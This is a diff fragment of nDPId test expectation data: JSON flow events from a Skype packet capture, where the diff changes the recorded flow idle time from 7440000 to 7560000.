-00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969689470,"flow_last_seen":1431969722520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50074,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969701671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969701671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969667439,"flow_last_seen":1431969689428,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50049,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969667439,"flow_last_seen":1431969689428,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50049,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969663377,"flow_last_seen":1431969687753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50044,"dst_port":40031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969663377,"flow_last_seen":1431969687753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50044,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969689470,"flow_last_seen":1431969722520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50074,"dst_port":40003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969689470,"flow_last_seen":1431969722520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50074,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969701671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969701671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969675950,"flow_last_seen":1431969702405,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63108,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969683498,"flow_last_seen":1431969716234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969683498,"flow_last_seen":1431969716234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969689470,"flow_last_seen":1431969717232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50076,"dst_port":40014,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969689470,"flow_last_seen":1431969717232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50076,"dst_port":40014,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969681480,"flow_last_seen":1431969709213,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50067,"dst_port":40027,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969681480,"flow_last_seen":1431969709213,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50067,"dst_port":40027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969690481,"flow_last_seen":1431969722726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50077,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969690481,"flow_last_seen":1431969722726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50077,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969699577,"flow_last_seen":1431969718631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50092,"dst_port":40020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969699577,"flow_last_seen":1431969718631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50092,"dst_port":40020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969704664,"flow_last_seen":1431969722362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":241,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50097,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969704664,"flow_last_seen":1431969722362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":241,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50097,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969788719,"flow_last_seen":1431969803191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50143,"dst_port":29059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969788719,"flow_last_seen":1431969803191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50143,"dst_port":29059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969789832,"flow_last_seen":1431969808350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50144,"dst_port":29059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969789832,"flow_last_seen":1431969808350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50144,"dst_port":29059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969689470,"flow_last_seen":1431969716588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50075,"dst_port":40003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969689470,"flow_last_seen":1431969716588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50075,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969683498,"flow_last_seen":1431969716234,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969683498,"flow_last_seen":1431969716234,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969689470,"flow_last_seen":1431969717232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50076,"dst_port":40014,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969689470,"flow_last_seen":1431969717232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50076,"dst_port":40014,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969681480,"flow_last_seen":1431969709213,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50067,"dst_port":40027,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969681480,"flow_last_seen":1431969709213,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50067,"dst_port":40027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969690481,"flow_last_seen":1431969722726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50077,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969690481,"flow_last_seen":1431969722726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50077,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969699577,"flow_last_seen":1431969718631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50092,"dst_port":40020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969699577,"flow_last_seen":1431969718631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50092,"dst_port":40020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969658376,"flow_last_seen":1431969684569,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50035,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969658376,"flow_last_seen":1431969684569,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50035,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969704664,"flow_last_seen":1431969722362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":241,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50097,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969704664,"flow_last_seen":1431969722362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":241,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50097,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969788719,"flow_last_seen":1431969803191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50143,"dst_port":29059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969788719,"flow_last_seen":1431969803191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50143,"dst_port":29059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
